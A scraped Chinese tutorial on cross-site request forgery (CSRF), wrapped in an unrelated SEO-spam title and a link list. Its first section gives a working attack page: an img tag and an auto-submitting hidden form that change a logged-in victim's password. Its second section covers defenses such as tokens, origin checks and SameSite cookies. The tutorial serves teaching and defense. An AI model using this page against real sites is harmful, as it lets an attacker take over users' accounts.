当前位置: 首页 > news >正文

东莞网站建设网站vi设计步骤流程

东莞网站建设网站,vi设计步骤流程,网页制作专业软件,抖音代运营服务达不到退费标准一、如何发起一次CSRF攻击 原理:CSRF 的本质实际上是利用了 Cookie 会自动在请求中携带的特性,通过伪造请求来执行恶意操作。 1、目标网站信息: 接口地址:https://victim.com/change-password 请求类型:get/post 接…

一、如何发起一次CSRF攻击

原理:CSRF 的本质实际上是利用了 Cookie 会自动在请求中携带的特性,通过伪造请求来执行恶意操作。

1、目标网站信息:

接口地址:https://victim.com/change-password
请求类型:get/post
接受参数:password

2、编写一个网页

<!DOCTYPE html>
<html><body><!-- GET类型的CSRF --><img src="https://victim.com/change-password?password=vme50"><!-- POST类型的CSRF --><form action="https://victim.com/change-password" method=POST><input type="hidden" name="password" value="vme50" /></form><script> document.forms[0].submit(); </script> </body>
</html>

3、诱导用户打开我们的网页

用户在已经登录了https://victim.com这个网站的情况下打开我们的网站,代码会自动发起网络请求,将受害者的账号密码修改为我们设置的值

二、防护策略

1、使用 CSRF Token(推荐):

在每个表单提交或敏感操作中包含一个随机生成的 CSRF Token,并将其与用户的会话关联起来。
服务器在接收到请求时验证 CSRF Token 的有效性,如果不匹配,则拒绝请求。
这样可以防止攻击者伪造请求,因为攻击者无法获取有效的 CSRF Token。

2、同源检测:

① 验证请求头:在服务器端验证请求头中的 Referer 字段或 Origin 字段,确保请求来自合法的源
② 验证域名:在服务器端对请求进行同源检测,只接受来自同一域名下的请求
③ 对在本域发起的攻击无效

3、设置 SameSite Cookie 属性:

将敏感的 Cookie 设置为 SameSite 属性为 Strict 或 Lax,限制其在跨站点请求中的发送,从而减少 CSRF 攻击的风险。

4、二次确认

① 验证码:对于敏感操作,可以要求用户输入验证码进行验证,以确保请求是由真实用户发起的

http://www.yayakq.cn/news/80385/

相关文章:

  • 网站设计流程的步骤包括深圳市住房城乡建设局网站首页
  • 珠海网站建设厚瑜wordpress 404.php
  • 智能家居网站模板深圳软件项目定制开发费用
  • 英文企业网站模板天津关键词排名推广
  • 网站开发的技术要求网站上传百度多久收录
  • 网站建设哪里有学企业二级网站怎么做
  • 重庆seo整站优化服务网站解析多久
  • 网站备案与不备案的区别程序员培训机构排名
  • 邢台 网站建设网推是干嘛的
  • 做流量网站吗手机网站程序下载
  • 网站建设及数据分析如何更好的推广app
  • 南宁高端网站崇明网站建设
  • 大型网站制作费用表想做外贸做哪些网站
  • 山东网站定制策划东莞网站设计费用
  • seo网站结构优化爱的网站
  • 哈尔滨网站建设哈尔滨中信建设有限责任公司待遇怎么样
  • 建设网站需要几个文件夹网站建设 建议
  • 设计排版网站荥阳网站制作
  • 做钢材的网站有哪些电子商务主要做什么
  • 统计二级域名的网站流量有什么用长沙网站公司哪家好
  • 云南旅游网站开发公司与做机器人有关的网站
  • 工信部网站怎么查网址做网站需要具备的基础条件
  • 做一公司网站企业建站公司服务
  • 滕州做网站的文创产品设计手绘
  • 机关门户网站app建设思考宁波做网站优化
  • 邮轮哪个网站是可以做特价胃肠的小程序开发需要什么
  • 网站网页手机网站 模板
  • 网站设计影响seo的因素在线制作图片热区
  • 自己做网站需要花钱吗建设项目自主验收公示网站
  • 中国网站有哪些公司在线查看qq空间网站